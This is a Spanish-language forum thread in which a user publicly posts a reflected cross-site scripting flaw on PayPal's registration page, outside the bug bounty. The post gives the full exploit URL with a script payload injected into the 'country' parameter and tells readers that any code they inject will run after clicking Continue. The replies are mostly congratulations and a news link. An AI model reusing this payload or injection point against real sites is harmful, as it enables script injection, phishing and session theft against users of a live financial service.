Os dejo mi segundo XSS en Paypal, como nunca pagan, paso de participar en el bug bounty.
(http://i.snag.gy/mK2DR.jpg)
https://registration.paypal.com/?mode=try&partner=Shopify&country=%22%3E%3Cimg%20src=x%20onerror=prompt%28/Pr0ph3t/%29;%3E
Sólo teneis que pulsar en Continuar y se ejecutará el código que inyectéis en la variable country.
Un saludo.
Interesante, no soy muy fan de los XSS o mejor dicho, no tengo conocimiento de como explotarlos.
Pero te felicito, por el esfuerzo y por compartirlo.
Buenisima pr0ph3t!! faltó la imagen!
You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login
Buenisima pr0ph3t!! faltó la imagen!
Añadida.
jajaa buena
muy bueno, gracias
Cada día me da más confianza este "banco"...
Gracias por la información Pr0ph3t.
Sa1uDoS
Ahi aparecio otro mas: http://www.mdzol.com/nota/467725-hacker-descubre-vulnerabilidad-en-paypal/
Proph3t congratz!!!
Wow excelente Proph3t, un saludo!!.